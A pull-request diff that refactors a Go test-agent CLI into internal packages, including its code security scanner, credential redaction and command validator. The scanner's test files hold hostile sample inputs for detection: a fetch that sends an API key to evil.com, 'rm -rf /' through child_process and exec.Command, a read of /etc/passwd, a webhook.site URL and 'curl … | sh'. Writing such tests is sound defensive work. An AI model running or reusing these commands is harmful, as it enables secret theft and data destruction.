### PR TITLE
refactor: extract leaf packages into internal/

### DIFF
--- a/agent.go
+++ b/agent.go
@@ -10,6 +10,8 @@ import (
 	"net/http"
 	"strings"
 	"time"
+
+	"github.com/qualitymax/qmax-code/internal/sysutil"
 )
 
 // Anthropic defaults for smart routing and direct API calls.
@@ -62,7 +64,7 @@ type Agent struct {
 	client          *http.Client
 	usage           TokenUsage
 	cancel          context.CancelFunc // cancel the current streaming request
-	logger          *Logger
+	logger          *sysutil.Logger
 	ollama          *OllamaClient // optional self-hosted LLM
 	ollamaMode      OllamaMode    // off, chat, or full
 	priorSessions   string        // cached prior-session summaries from backend
@@ -626,7 +628,7 @@ func (a *Agent) callStreamingAPI(term *Terminal, model string) ([]ContentBlock, 
 		// Telemetry: send only the structural fields and the API error code.
 		// The body (which may include echoed-back prompt content in validation
 		// errors) is logged locally but NOT forwarded to Bugsink.
-		CaptureError(fmt.Errorf("anthropic API error %d", resp.StatusCode), map[string]interface{}{
+		sysutil.CaptureError(fmt.Errorf("anthropic API error %d", resp.StatusCode), map[string]interface{}{
 			"model":         model,
 			"status_code":   fmt.Sprintf("%d", resp.StatusCode),
 			"message_count": fmt.Sprintf("%d", len(a.history)),

--- a/api_client.go
+++ b/api_client.go
@@ -10,6 +10,9 @@ import (
 	"strconv"
 	"strings"
 	"time"
+
+	"github.com/qualitymax/qmax-code/internal/security"
+	"github.com/qualitymax/qmax-code/internal/sysutil"
 )
 
 // APIClient calls QualityMax REST API directly (no qmax CLI needed).
@@ -157,7 +160,7 @@ func (c *APIClient) RunTest(ctx context.Context, scriptID int, headless bool, br
 		// Always request keepalive: the server may use E2B even when not
 		// explicitly asked (e.g. per-script server-side policy). Without this,
 		// the websockify port is gone before the end-of-turn auto-launch fires.
-		"live_feed_hold_seconds": liveFeedHoldSeconds,
+		"live_feed_hold_seconds": sysutil.LiveFeedHoldSeconds,
 	}
 	if useCloudSandbox {
 		body["use_e2b"] = true
@@ -224,7 +227,7 @@ func (c *APIClient) RunTestsBatch(ctx context.Context, scriptIDs, baseURL string
 	}
 	body := map[string]interface{}{
 		"script_ids":             ids,
-		"live_feed_hold_seconds": liveFeedHoldSeconds,
+		"live_feed_hold_seconds": sysutil.LiveFeedHoldSeconds,
 	}
 	if useCloudSandbox {
 		body["use_e2b"] = true
@@ -264,7 +267,7 @@ func (c *APIClient) StartCrawl(ctx context.Context, projectID int, url string, d
 	body := map[string]interface{}{
 		"project_id":             projectID,
 		"url":                    url,
-		"live_feed_hold_seconds": liveFeedHoldSeconds,
+		"live_feed_hold_seconds": sysutil.LiveFeedHoldSeconds,
 	}
 	if useCloudSandbox {
 		body["use_e2b"] = true
@@ -817,7 +820,7 @@ func (c *APIClient) doRequest(req *http.Request) string {
 
 	resp, err := c.HTTP.Do(req)
 	if err != nil {
-		return jsonError(fmt.Sprintf("request failed: %s", redactSensitive(err.Error())))
+		return jsonError(fmt.Sprintf("request failed: %s", security.RedactSensitive(err.Error())))
 	}
 	defer resp.Body.Close()
 
@@ -844,11 +847,11 @@ func (c *APIClient) doRequest(req *http.Request) string {
 		if errMsg == "" {
 			errMsg = fmt.Sprintf("HTTP %d: %s", resp.StatusCode, string(data))
 		}
-		errMsg = redactSensitive(errMsg)
+		errMsg = security.RedactSensitive(errMsg)
 
 		// Report server errors (5xx) and auth errors (401/403) to Bugsink
 		if resp.StatusCode >= 500 || resp.StatusCode == 401 || resp.StatusCode == 403 {
-			CaptureError(fmt.Errorf("API error: %s", errMsg), map[string]interface{}{
+			sysutil.CaptureError(fmt.Errorf("API error: %s", errMsg), map[string]interface{}{
 				"method":      req.Method,
 				"path":        req.URL.Path,
 				"status_code": fmt.Sprintf("%d", resp.StatusCode),
@@ -862,7 +865,7 @@ func (c *APIClient) doRequest(req *http.Request) string {
 }
 
 func jsonError(msg string) string {
-	msg = redactSensitive(msg)
+	msg = security.RedactSensitive(msg)
 	escaped, _ := json.Marshal(msg)
 	return fmt.Sprintf(`{"error": %s}`, string(escaped))
 }

--- a/cc_agent.go
+++ b/cc_agent.go
@@ -12,6 +12,8 @@ import (
 	"strings"
 	"sync"
 	"time"
+
+	"github.com/qualitymax/qmax-code/internal/sysutil"
 )
 
 // CLIAgent is the interface implemented by both CCAgent (claude CLI) and
@@ -198,10 +200,10 @@ func (a *CCAgent) writeMCPConfig() error {
 	if a.sctx.LiveFeed {
 		env["QMAX_LIVE_FEED"] = "1"
 	}
-	if path := liveURLFilePath(); path != "" {
+	if path := sysutil.LiveURLFilePath(); path != "" {
 		env["QMAX_LIVE_URL_FILE"] = path
 	}
-	if path := execIDFilePath(); path != "" {
+	if path := sysutil.ExecIDFilePath(); path != "" {
 		env["QMAX_EXEC_ID_FILE"] = path
 	}
 
@@ -340,7 +342,7 @@ func cleanupStaleMCPConfigs() {
 		if err != nil {
 			continue
 		}
-		if !pidAlive(pid) {
+		if !sysutil.PidAlive(pid) {
 			_ = os.Remove(path)
 		}
 	}

--- a/cmd_browserfeed.go
+++ b/cmd_browserfeed.go
@@ -21,6 +21,8 @@ import (
 
 	tea "github.com/charmbracelet/bubbletea"
 	"golang.org/x/term"
+
+	"github.com/qualitymax/qmax-code/internal/vnc"
 )
 
 type blockMode int
@@ -35,7 +37,7 @@ const (
 // blockModeQuarter (default, sharper) or blockModeHalf (simpler, more
 // portable).
 func ShowBrowserFeed(url string, mode blockMode) error {
-	stream, err := DialVNC(context.Background(), url, 10)
+	stream, err := vnc.DialVNC(context.Background(), url, 10)
 	if err != nil {
 		return fmt.Errorf("connect: %w", err)
 	}
@@ -46,11 +48,11 @@ func ShowBrowserFeed(url string, mode blockMode) error {
 // VNCStream. Ownership of the stream is transferred; the stream is closed
 // when the user quits. statusHint is shown in the status line until the
 // first frame arrives.
-func ShowBrowserFeedFromStream(stream *VNCStream, mode blockMode, statusHint string) error {
+func ShowBrowserFeedFromStream(stream *vnc.VNCStream, mode blockMode, statusHint string) error {
 	return showBrowserFeedStream(stream, mode, statusHint)
 }
 
-func showBrowserFeedStream(stream *VNCStream, mode blockMode, status string) error {
+func showBrowserFeedStream(stream *vnc.VNCStream, mode blockMode, status string) error {
 	cols, rows := bfTermSize()
 	m := browserFeedModel{
 		stream:   stream,
@@ -93,7 +95,7 @@ func showBrowserFeedStream(stream *VNCStream, mode blockMode, status string) err
 
 // ─── Bubble Tea model ────────────────────────────────────────────────────────
 
-type frameMsg struct{ frame *VNCFrame }
+type frameMsg struct{ frame *vnc.VNCFrame }
 type streamErrMsg struct{ err error }
 type streamClosedMsg struct{}
 
@@ -115,9 +117,9 @@ type blockLayout struct {
 const bfSmallFraction = 0.6
 
 type browserFeedModel struct {
-	stream *VNCStream
+	stream *vnc.VNCStream
 
-	frame      *VNCFrame
+	frame      *vnc.VNCFrame
 	termCols   int // actual terminal width
 	termRows   int // actual terminal height
 	cols       int // effective render width (capped in small mode)
@@ -251,7 +253,7 @@ func (m browserFeedModel) View() string {
 
 // ─── Block renderers ─────────────────────────────────────────────────────────
 
-func renderBlocks(frame *VNCFrame, cols, rows int, mode blockMode) (string, blockLayout) {
+func renderBlocks(frame *vnc.VNCFrame, cols, rows int, mode blockMode) (string, blockLayout) {
 	switch mode {
 	case blockModeHalf:
 		return renderHalfBlocks(frame, cols, rows)
@@ -327,7 +329,7 @@ var quarterPartitions = [7]uint8{
 	0b0110, // {1,2} vs {0,3} — diagonals
 }
 
-func renderQuarterBlocks(frame *VNCFrame, cols, rows int) (string, blockLayout) {
+func renderQuarterBlocks(frame *vnc.VNCFrame, cols, rows int) (string, blockLayout) {
 	layout := blockLayout{
 		srcW: frame.Width, srcH: frame.Height,
 		pixelsPerCellX: 2, pixelsPerCellY: 2,
@@ -461,7 +463,7 @@ func scorePartition(p [4][3]byte, mask uint8) ([3]byte, [3]byte, int) {
 
 // ─── Half-block renderer (kept as fallback) ──────────────────────────────────
 
-func renderHalfBlocks(frame *VNCFrame, cols, rows int) (string, blockLayout) {
+func renderHalfBlocks(frame *vnc.VNCFrame, cols, rows int) (string, blockLayout) {
 	layout := blockLayout{
 		srcW: frame.Width, srcH: frame.Height,
 		pixelsPerCellX: 1, pixelsPerCellY: 2,
@@ -676,7 +678,7 @@ func buildIndexMap(srcLen, dstLen int) []int {
 // pixelAt returns the BGRX pixel at (x, y) as RGB. The framebuffer stores
 // little-endian 32-bit pixels with shifts R<<16, G<<8, B<<0 (see SetPixelFormat
 // in vnc_stream.go), which on disk is [B, G, R, X].
-func pixelAt(f *VNCFrame, x, y int) [3]byte {
+func pixelAt(f *vnc.VNCFrame, x, y int) [3]byte {
 	if x < 0 || y < 0 || x >= f.Width || y >= f.Height {
 		return [3]byte{0, 0, 0}
 	}

--- a/cmd_browserfeed_test.go
+++ b/cmd_browserfeed_test.go
@@ -102,3 +102,43 @@ func TestMouseToSrcPixel(t *testing.T) {
 		t.Error("expected !ok in left/top margin")
 	}
 }
+
+func TestBuildIndexMap(t *testing.T) {
+	m := buildIndexMap(100, 10)
+	if len(m) != 10 {
+		t.Fatalf("len = %d, want 10", len(m))
+	}
+	for i, v := range m {
+		if v < 0 || v >= 100 {
+			t.Errorf("m[%d] = %d out of range", i, v)
+		}
+		if i > 0 && v < m[i-1] {
+			t.Errorf("non-monotonic at %d: %d < %d", i, v, m[i-1])
+		}
+	}
+	m = buildIndexMap(3, 9)
+	if len(m) != 9 {
+		t.Fatalf("len = %d, want 9", len(m))
+	}
+	for i, v := range m {
+		if v < 0 || v >= 3 {
+			t.Errorf("upsampled m[%d] = %d out of range", i, v)
+		}
+	}
+}
+
+func TestBuildIndexMapZeroDst(t *testing.T) {
+	m := buildIndexMap(100, 0)
+	if len(m) != 0 {
+		t.Errorf("zero dst: len = %d, want 0", len(m))
+	}
+}
+
+func TestBuildIndexMapSameSize(t *testing.T) {
+	m := buildIndexMap(5, 5)
+	for i, v := range m {
+		if v != i {
+			t.Errorf("same-size map[%d] = %d, want %d", i, v, i)
+		}
+	}
+}

--- a/codex_agent.go
+++ b/codex_agent.go
@@ -11,6 +11,8 @@ import (
 	"strings"
 	"sync"
 	"time"
+
+	"github.com/qualitymax/qmax-code/internal/sysutil"
 )
 
 // CodexAgent orchestrates an OpenAI Codex CLI subprocess for LLM inference.
@@ -105,10 +107,10 @@ func (a *CodexAgent) writeMCPConfig() error {
 	if a.sctx.LiveFeed {
 		env["QMAX_LIVE_FEED"] = "1"
 	}
-	if path := liveURLFilePath(); path != "" {
+	if path := sysutil.LiveURLFilePath(); path != "" {
 		env["QMAX_LIVE_URL_FILE"] = path
 	}
-	if path := execIDFilePath(); path != "" {
+	if path := sysutil.ExecIDFilePath(); path != "" {
 		env["QMAX_EXEC_ID_FILE"] = path
 	}
 

--- a/internal/security/security.go
+++ b/internal/security/security.go
@@ -1,4 +1,4 @@
-package main
+package security
 
 import (
 	"fmt"
@@ -47,9 +47,9 @@ var sensitivePatterns = []struct {
 	{regexp.MustCompile(`(?i)("?(?:api[_-]?key|token|anthropic[_-]?key)"?\s*[:=]\s*)[^"',\s}]+`), `${1}[REDACTED]`},
 }
 
-// redactSensitive removes common credential shapes before text is shown,
+// RedactSensitive removes common credential shapes before text is shown,
 // returned to the agent, or sent to optional telemetry.
-func redactSensitive(text string) string {
+func RedactSensitive(text string) string {
 	if text == "" {
 		return ""
 	}
@@ -77,12 +77,12 @@ func redactURLCredentials(text string) string {
 	return text
 }
 
-// detectLanguage returns one of "js" (Playwright/Jest/Cypress), "go",
+// DetectLanguage returns one of "js" (Playwright/Jest/Cypress), "go",
 // "rust", "python", or "" for an unrecognized shape. We need this because
 // the "is this a test file" and "what's dangerous" checks are
 // language-specific — `TestFoo(t *testing.T)` is valid Go testing but
 // doesn't contain `test(`, so a Playwright-only scanner rejects it.
-func detectLanguage(code string) string {
+func DetectLanguage(code string) string {
 	// Strong markers — earliest match wins. Order matters: Go's `package`
 	// keyword can appear inside JS/TS string literals, so we look for the
 	// `package X` / `func TestX` combo.
@@ -107,10 +107,10 @@ func detectLanguage(code string) string {
 	return ""
 }
 
-// hasTestDeclaration returns true if the code contains an idiomatic test
+// HasTestDeclaration returns true if the code contains an idiomatic test
 // declaration for its detected language. Used as the "this looks like a
 // test file, not arbitrary code" gate.
-func hasTestDeclaration(code, lang string) bool {
+func HasTestDeclaration(code, lang string) bool {
 	switch lang {
 	case "go":
 		// `func TestXxx(t *testing.T)` or `func BenchmarkXxx` or `func FuzzXxx`.
@@ -130,12 +130,12 @@ func hasTestDeclaration(code, lang string) bool {
 	return false
 }
 
-// scanCodeSecurity checks generated code for dangerous patterns.
+// ScanCode checks generated code for dangerous patterns.
 // Returns a list of violations, or empty if code is safe.
-func scanCodeSecurity(code string) []string {
+func ScanCode(code string) []string {
 	var violations []string
 
-	lang := detectLanguage(code)
+	lang := DetectLanguage(code)
 
 	// Only apply JS/Node dangerous-pattern checks to JS code. The existing
 	// dangerousPatterns table targets `require('fs')`, `process.env`,
@@ -162,7 +162,7 @@ func scanCodeSecurity(code string) []string {
 	// everything else, and the runner's binary allow-list remains the
 	// actual security boundary at execution time.
 	if lang == "go" {
-		allows := parseQmaxAllows(code)
+		allows := ParseAllows(code)
 		goDangers := []struct {
 			pat   *regexp.Regexp
 			why   string
@@ -246,7 +246,7 @@ func scanCodeSecurity(code string) []string {
 	// that blocked a live user session healing Go tests: the previous
 	// check only accepted Playwright/Jest patterns (`test(`, `describe(`,
 	// `it(`) and falsely rejected every Go / Rust / Python test file.
-	if !hasTestDeclaration(code, lang) {
+	if !HasTestDeclaration(code, lang) {
 		violations = append(violations, "No test declaration found — not a valid test file")
 	}
 
@@ -265,11 +265,11 @@ func scanCodeSecurity(code string) []string {
 // intentionally ignored to keep the marker visible to grep + reviewers.
 var qmaxAllowRE = regexp.MustCompile(`(?i)//\s*qmax:allow=([^\r\n]+)`)
 
-// parseQmaxAllows extracts the set of rule names the file opts into via
+// ParseAllows extracts the set of rule names the file opts into via
 // `// qmax:allow=...` markers. Returned as a set keyed by the exact rule
 // name (e.g. `os/exec`, `exec.Command`). Missing markers => empty set =>
 // default-deny stays in effect.
-func parseQmaxAllows(code string) map[string]bool {
+func ParseAllows(code string) map[string]bool {
 	allows := make(map[string]bool)
 	for _, m := range qmaxAllowRE.FindAllStringSubmatch(code, -1) {
 		for _, raw := range strings.Split(m[1], ",") {
@@ -341,9 +341,9 @@ var blockedShellTokens = []string{
 	"\n",
 }
 
-// validateCommand checks if a shell command is safe to execute.
+// ValidateCommand checks if a shell command is safe to execute.
 // Returns empty string if safe, or reason if blocked.
-func validateCommand(cmd string) string {
+func ValidateCommand(cmd string) string {
 	cmd = strings.TrimSpace(cmd)
 
 	// Block empty commands

--- a/internal/security/security_language_test.go
+++ b/internal/security/security_language_test.go
@@ -1,11 +1,11 @@
-package main
+package security
 
 import (
 	"strings"
 	"testing"
 )
 
-// Regression tests for the "language-aware scanCodeSecurity" fix.
+// Regression tests for the "language-aware ScanCode" fix.
 // The bug: the pre-fix scanner required Playwright-style `test(...)`
 // calls in every script, which meant Go/Rust/Python tests were all
 // rejected with "No test() or describe() found". A live user hit this
@@ -75,9 +75,9 @@ func TestDetectLanguage(t *testing.T) {
 
 	for _, tc := range cases {
 		t.Run(tc.name, func(t *testing.T) {
-			got := detectLanguage(tc.code)
+			got := DetectLanguage(tc.code)
 			if got != tc.want {
-				t.Errorf("detectLanguage: got %q, want %q\nCode:\n%s", got, tc.want, tc.code)
+				t.Errorf("DetectLanguage: got %q, want %q\nCode:\n%s", got, tc.want, tc.code)
 			}
 		})
 	}
@@ -96,7 +96,7 @@ func TestFoo(t *testing.T) {
 	}
 }
 `
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	if len(violations) != 0 {
 		t.Errorf("Valid Go test wrongly flagged. Violations: %v", violations)
 	}
@@ -108,7 +108,7 @@ fn test_addition() {
     assert_eq!(1 + 1, 2);
 }
 `
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	if len(violations) != 0 {
 		t.Errorf("Valid Rust test wrongly flagged. Violations: %v", violations)
 	}
@@ -120,7 +120,7 @@ func TestScanCodeSecurity_PytestPasses(t *testing.T) {
 def test_addition():
     assert 1 + 1 == 2
 `
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	if len(violations) != 0 {
 		t.Errorf("Valid pytest wrongly flagged. Violations: %v", violations)
 	}
@@ -140,7 +140,7 @@ func TestEvil(t *testing.T) {
 	exec.Command("rm", "-rf", "/").Run()
 }
 `
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	hasOsExec := false
 	for _, v := range violations {
 		if strings.Contains(v, "os/exec") || strings.Contains(v, "shell execution") {
@@ -174,7 +174,7 @@ func TestCLI(t *testing.T) {
 	}
 }
 `
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	for _, v := range violations {
 		if strings.Contains(v, "os/exec") || strings.Contains(v, "exec.Command") {
 			t.Errorf("With qmax:allow markers, os/exec + exec.Command must NOT be flagged. Got: %v", violations)
@@ -197,7 +197,7 @@ func TestX(t *testing.T) {
 	exec.Command("rm", "-rf", "/").Run()
 }
 `
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	osExecOK, cmdBlocked := true, false
 	for _, v := range violations {
 		if strings.Contains(v, "os/exec import") {
@@ -226,7 +226,7 @@ import (
 
 func TestX(t *testing.T) { _ = exec.Command("ls").Run() }
 `
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	for _, v := range violations {
 		if strings.Contains(v, "os/exec") || strings.Contains(v, "exec.Command") {
 			t.Errorf("Comma-separated marker should grant both rules. Got: %v", violations)
@@ -249,7 +249,7 @@ func TestParseQmaxAllows(t *testing.T) {
 	}
 	for _, c := range cases {
 		t.Run(c.name, func(t *testing.T) {
-			got := parseQmaxAllows(c.code)
+			got := ParseAllows(c.code)
 			for _, w := range c.want {
 				if !got[w] {
 					t.Errorf("expected %q in allows; got %v", w, got)
@@ -268,7 +268,7 @@ fn test_x() {
     std::process::Command::new("sh").arg("-c").arg("evil").output().unwrap();
 }
 `
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	hasProc := false
 	for _, v := range violations {
 		if strings.Contains(v, "Command") || strings.Contains(v, "shell execution") {
@@ -287,7 +287,7 @@ import subprocess
 def test_x():
     subprocess.run(["evil"])
 `
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	hasSubp := false
 	for _, v := range violations {
 		if strings.Contains(v, "subprocess") || strings.Contains(v, "shell execution") {
@@ -311,7 +311,7 @@ import "testing"
 // NOTE: docs for future versions may mention process.env compatibility.
 func TestFoo(t *testing.T) {}
 `
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	for _, v := range violations {
 		if strings.Contains(v, "process.env") {
 			t.Errorf("JS process.env rule should NOT fire on Go code; got: %v", violations)
@@ -341,9 +341,9 @@ func TestHasTestDeclaration(t *testing.T) {
 			label = label[:20]
 		}
 		t.Run(c.lang+"/"+label, func(t *testing.T) {
-			got := hasTestDeclaration(c.code, c.lang)
+			got := HasTestDeclaration(c.code, c.lang)
 			if got != c.want {
-				t.Errorf("hasTestDeclaration(%q, %q) = %v, want %v", c.code, c.lang, got, c.want)
+				t.Errorf("HasTestDeclaration(%q, %q) = %v, want %v", c.code, c.lang, got, c.want)
 			}
 		})
 	}

--- a/internal/security/security_test.go
+++ b/internal/security/security_test.go
@@ -1,4 +1,4 @@
-package main
+package security
 
 import (
 	"strings"
@@ -12,7 +12,7 @@ test('loads page', async ({ page }) => {
     await page.goto('https://example.com');
     await expect(page).toHaveTitle(/Example/);
 });`
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	if len(violations) > 0 {
 		t.Errorf("Clean code should pass, got violations: %v", violations)
 	}
@@ -21,7 +21,7 @@ test('loads page', async ({ page }) => {
 func TestScanCodeSecurity_ChildProcess(t *testing.T) {
 	code := `require('child_process').exec('rm -rf /');
 test('bad', async () => {});`
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	if len(violations) == 0 {
 		t.Error("Should detect child_process")
 	}
@@ -29,7 +29,7 @@ test('bad', async () => {});`
 
 func TestScanCodeSecurity_Eval(t *testing.T) {
 	code := `test('bad', async () => { eval('malicious code'); });`
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	if len(violations) == 0 {
 		t.Error("Should detect eval()")
 	}
@@ -40,7 +40,7 @@ func TestScanCodeSecurity_ProcessEnv(t *testing.T) {
         const key = process.env.API_KEY;
         await fetch('https://evil.com?key=' + key);
     });`
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	if len(violations) == 0 {
 		t.Error("Should detect process.env")
 	}
@@ -49,7 +49,7 @@ func TestScanCodeSecurity_ProcessEnv(t *testing.T) {
 func TestScanCodeSecurity_FsImport(t *testing.T) {
 	code := `const fs = require('fs');
 test('read secrets', async () => { fs.readFileSync('/etc/passwd'); });`
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	if len(violations) == 0 {
 		t.Error("Should detect fs import")
 	}
@@ -58,7 +58,7 @@ test('read secrets', async () => { fs.readFileSync('/etc/passwd'); });`
 func TestScanCodeSecurity_ESImport(t *testing.T) {
 	code := `import { exec } from 'child_process';
 test('bad', async () => { exec('whoami'); });`
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	if len(violations) == 0 {
 		t.Error("Should detect ES import of child_process")
 	}
@@ -68,7 +68,7 @@ func TestScanCodeSecurity_SuspiciousURL(t *testing.T) {
 	code := `test('exfil', async ({ page }) => {
         await page.goto('https://webhook.site/abc123');
     });`
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	if len(violations) == 0 {
 		t.Error("Should detect webhook.site URL")
 	}
@@ -79,7 +79,7 @@ func TestScanCodeSecurity_AllowedURLs(t *testing.T) {
         await page.goto('https://localhost:3000');
         await page.goto('https://app.qualitymax.io');
     });`
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	if len(violations) > 0 {
 		t.Errorf("Localhost and qualitymax URLs should be allowed, got: %v", violations)
 	}
@@ -92,7 +92,7 @@ token: sk-ant-supersecret
 raw=sk-ant-rawsecret
 url=https://user:pass@llm.example.com/v1`
 
-	got := redactSensitive(input)
+	got := RedactSensitive(input)
 	for _, leaked := range []string{"abc.def-123", "qm-live-secret", "sk-ant-supersecret", "user:pass@"} {
 		if strings.Contains(got, leaked) {
 			t.Fatalf("redacted output leaked %q: %s", leaked, got)
@@ -129,8 +129,8 @@ func TestRedactSensitivePreservesShape(t *testing.T) {
 	}
 	for _, tc := range cases {
 		t.Run(tc.name, func(t *testing.T) {
-			if got := redactSensitive(tc.in); got != tc.want {
-				t.Fatalf("redactSensitive(%q):\n got: %q\nwant: %q", tc.in, got, tc.want)
+			if got := RedactSensitive(tc.in); got != tc.want {
+				t.Fatalf("RedactSensitive(%q):\n got: %q\nwant: %q", tc.in, got, tc.want)
 			}
 		})
 	}
@@ -138,7 +138,7 @@ func TestRedactSensitivePreservesShape(t *testing.T) {
 
 func TestScanCodeSecurity_NoTestFunction(t *testing.T) {
 	code := `console.log('not a test file');`
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	found := false
 	for _, v := range violations {
 		// Updated message wording after language-aware check — matches both
@@ -154,7 +154,7 @@ func TestScanCodeSecurity_NoTestFunction(t *testing.T) {
 
 func TestScanCodeSecurity_TooLarge(t *testing.T) {
 	code := strings.Repeat("x", 100001) + "\ntest('x', async () => {});"
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	found := false
 	for _, v := range violations {
 		if strings.Contains(v, "100KB") {
@@ -168,7 +168,7 @@ func TestScanCodeSecurity_TooLarge(t *testing.T) {
 
 func TestScanCodeSecurity_SpawnExec(t *testing.T) {
 	code := `test('cmd', async () => { execSync('ls'); });`
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	if len(violations) == 0 {
 		t.Error("Should detect execSync")
 	}
@@ -176,7 +176,7 @@ func TestScanCodeSecurity_SpawnExec(t *testing.T) {
 
 func TestScanCodeSecurity_NewFunction(t *testing.T) {
 	code := `test('dynamic', async () => { new Function('return 1')(); });`
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	if len(violations) == 0 {
 		t.Error("Should detect new Function()")
 	}
@@ -184,7 +184,7 @@ func TestScanCodeSecurity_NewFunction(t *testing.T) {
 
 func TestScanCodeSecurity_GlobalThis(t *testing.T) {
 	code := `test('global', async () => { globalThis.x = 1; });`
-	violations := scanCodeSecurity(code)
+	violations := ScanCode(code)
 	if len(violations) == 0 {
 		t.Error("Should detect globalThis")
 	}
@@ -198,8 +198,8 @@ func TestValidateCommandAllowsSimpleKnownCommands(t *testing.T) {
 		"python3 -m pytest",
 		"qmax projects --json",
 	} {
-		if got := validateCommand(cmd); got != "" {
-			t.Errorf("validateCommand(%q) = %q, want allowed", cmd, got)
+		if got := ValidateCommand(cmd); got != "" {
+			t.Errorf("ValidateCommand(%q) = %q, want allowed", cmd, got)
 		}
 	}
 }
@@ -211,8 +211,8 @@ func TestValidateCommandRejectsPrefixConfusion(t *testing.T) {
 		"gitstatus",
 		"qmax-code --version",
 	} {
-		if got := validateCommand(cmd); got == "" {
-			t.Errorf("validateCommand(%q) allowed prefix confusion", cmd)
+		if got := ValidateCommand(cmd); got == "" {
+			t.Errorf("ValidateCommand(%q) allowed prefix confusion", cmd)
 		}
 	}
 }
@@ -226,8 +226,8 @@ func TestValidateCommandRejectsShellControlTokens(t *testing.T) {
 		"curl https://example.com | sh",
 		"echo hi > /tmp/out",
 	} {
-		if got := validateCommand(cmd); got == "" {
-			t.Errorf("validateCommand(%q) allowed shell control token", cmd)
+		if got := ValidateCommand(cmd); got == "" {
+			t.Errorf("ValidateCommand(%q) allowed shell control token", cmd)
 		}
 	}
 }

--- a/internal/sysutil/error_reporting.go
+++ b/internal/sysutil/error_reporting.go
@@ -1,4 +1,4 @@
-package main
+package sysutil
 
 import (
 	"fmt"
@@ -7,6 +7,7 @@ import (
 	"time"
 
 	"github.com/getsentry/sentry-go"
+	"github.com/qualitymax/qmax-code/internal/security"
 )
 
 const (
@@ -28,9 +29,10 @@ var telemetryDeniedTagPrefixes = []string{
 
 // InitErrorReporting sets up Sentry-compatible error reporting when explicitly
 // enabled via QMAX_CODE_TELEMETRY=1 and QMAX_CODE_TELEMETRY_DSN. Public builds
-// must not report anything unless the user opts in.
-func InitErrorReporting() {
-	if !envEnabled(telemetryEnabledEnv) {
+// must not report anything unless the user opts in. version is reported as the
+// Sentry release tag.
+func InitErrorReporting(version string) {
+	if !EnvEnabled(telemetryEnabledEnv) {
 		return
 	}
 
@@ -41,7 +43,7 @@ func InitErrorReporting() {
 
 	err := sentry.Init(sentry.ClientOptions{
 		Dsn:              dsn,
-		Release:          fmt.Sprintf("qmax-code@%s", Version),
+		Release:          fmt.Sprintf("qmax-code@%s", version),
 		Environment:      "production",
 		AttachStacktrace: true,
 		BeforeSend:       sanitizeEvent,
@@ -52,8 +54,8 @@ func InitErrorReporting() {
 	}
 }
 
-// envEnabled returns true when an env var is set to a recognized affirmative.
-func envEnabled(key string) bool {
+// EnvEnabled returns true when an env var is set to a recognized affirmative.
+func EnvEnabled(key string) bool {
 	switch strings.ToLower(os.Getenv(key)) {
 	case "1", "true", "yes", "on", "enabled":
 		return true
@@ -121,12 +123,12 @@ func FlushErrorReporting() {
 // CaptureError reports a non-fatal error to Bugsink.
 func CaptureError(err error, context map[string]interface{}) {
 	if err != nil {
-		err = fmt.Errorf("%s", redactSensitive(err.Error()))
+		err = fmt.Errorf("%s", security.RedactSensitive(err.Error()))
 	}
 	if context != nil {
 		sentry.WithScope(func(scope *sentry.Scope) {
 			for k, v := range context {
-				scope.SetTag(k, redactSensitive(fmt.Sprintf("%v", v)))
+				scope.SetTag(k, security.RedactSensitive(fmt.Sprintf("%v", v)))
 			}
 			sentry.CaptureException(err)
 		})
@@ -137,7 +139,7 @@ func CaptureError(err error, context map[string]interface{}) {
 
 // CaptureMessage reports an informational message to Bugsink.
 func CaptureMessage(msg string) {
-	sentry.CaptureMessage(redactSensitive(msg))
+	sentry.CaptureMessage(security.RedactSensitive(msg))
 }
 
 // RecoverPanic catches panics and reports them to Bugsink before re-panicking.

--- a/internal/sysutil/live_url_channel.go
+++ b/internal/sysutil/live_url_channel.go
@@ -1,4 +1,4 @@
-package main
+package sysutil
 
 // Side channel for handing captured live_browser_url values from a CC /
 // Codex MCP subprocess back to the parent qmax-code REPL.
@@ -31,19 +31,33 @@ var (
 	execIDFileVal  string
 )
 
-// liveFeedHoldSeconds is the post-run sandbox-keepalive window we ask the
+// ResetLiveURLFileForTest resets the cached singleton path so a test can run
+// LiveURLFilePath() against a fresh sync.Once. Test-only helper exported here
+// because callers live in another package.
+func ResetLiveURLFileForTest() {
+	liveURLFileOnce = sync.Once{}
+	liveURLFileVal = ""
+}
+
+// ResetExecIDFileForTest is the execID equivalent of ResetLiveURLFileForTest.
+func ResetExecIDFileForTest() {
+	execIDFileOnce = sync.Once{}
+	execIDFileVal = ""
+}
+
+// LiveFeedHoldSeconds is the post-run sandbox-keepalive window we ask the
 // server to honour when LiveFeed is on. Long enough to absorb network +
 // agent-stream latency between server-side run completion and the moment
 // the client opens /browserfeed; short enough that abandoned sandboxes
 // don't cost much. Server caps this via QMAX_LIVE_FEED_HOLD_MAX_SECONDS
 // (default 600) so a misconfigured client can't pin sandboxes forever.
-const liveFeedHoldSeconds = 120
+const LiveFeedHoldSeconds = 120
 
-// liveURLFilePath returns the path to the per-process side-channel file,
+// LiveURLFilePath returns the path to the per-process side-channel file,
 // computing it once per process. Empty string means we couldn't resolve
 // a home directory — caller should treat that as "feature unavailable"
 // rather than failing.
-func liveURLFilePath() string {
